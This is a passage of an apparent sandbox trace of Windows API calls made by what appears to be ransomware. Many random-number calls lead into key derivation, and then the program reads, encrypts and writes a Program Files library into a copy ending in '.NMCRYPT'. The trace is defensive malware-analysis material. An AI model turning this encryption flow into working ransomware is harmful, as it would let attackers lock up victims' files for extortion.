pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.279] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0143.280] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x607570*, pdwDataLen=0x2d7eb2c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x607570*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0143.281] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x607670*, pdwDataLen=0x2d7eb2c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x607670*, pdwDataLen=0x2d7eb2c*=0x100) returned 1 [0143.282] CryptCreateHash (in: hProv=0x8becf8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60efc4 | out: phHash=0x60efc4) returned 1 [0143.282] CryptHashData (hHash=0x8be838, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.282] CryptDeriveKey (in: hProv=0x8becf8, Algid=0x6610, hBaseData=0x8be838, dwFlags=0x4, phKey=0x60efc8 | out: phKey=0x60efc8*=0x8be478) returned 1 [0143.282] CryptSetKeyParam (hKey=0x8be478, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0143.282] CryptSetKeyParam (hKey=0x8be478, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0143.282] wcslen (_String="\\\\?\\") returned 0x4 [0143.282] CryptDuplicateKey (in: hKey=0x8be478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7eb34 | out: phKey=0x2d7eb34*=0x8be8b8) returned 1 [0143.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.NMCRYPT" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0143.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0143.283] GetFileSizeEx (in: hFile=0x288, lpFileSize=0x2d7eb24 | out: lpFileSize=0x2d7eb24*=23232) returned 1 [0143.284] WriteFile (in: hFile=0x284, lpBuffer=0x607570*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x607570*, lpNumberOfBytesWritten=0x2d7eb1c*=0x200, lpOverlapped=0x0) returned 1 [0143.284] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.348] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.349] GetLastError () returned 0x0 [0143.349] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.367] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.367] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.367] GetLastError () returned 0x0 [0143.367] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.367] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.367] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.367] GetLastError () returned 0x0 [0143.367] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.367] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.367] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.367] GetLastError () returned 0x0 [0143.367] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.367] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.367] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.367] GetLastError () returned 0x0 [0143.367] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.367] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.367] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.367] GetLastError () returned 0x0 [0143.367] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.368] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.368] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.368] GetLastError () returned 0x0 [0143.368] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.368] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.368] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.368] GetLastError () returned 0x0 [0143.368] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.368] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.368] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.368] GetLastError () returned 0x0 [0143.368] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.368] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.368] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.368] GetLastError () returned 0x0 [0143.368] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.368] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.368] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.368] GetLastError () returned 0x0 [0143.368] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.368] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.368] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.368] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.369] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.369] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.369] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.369] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.369] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, 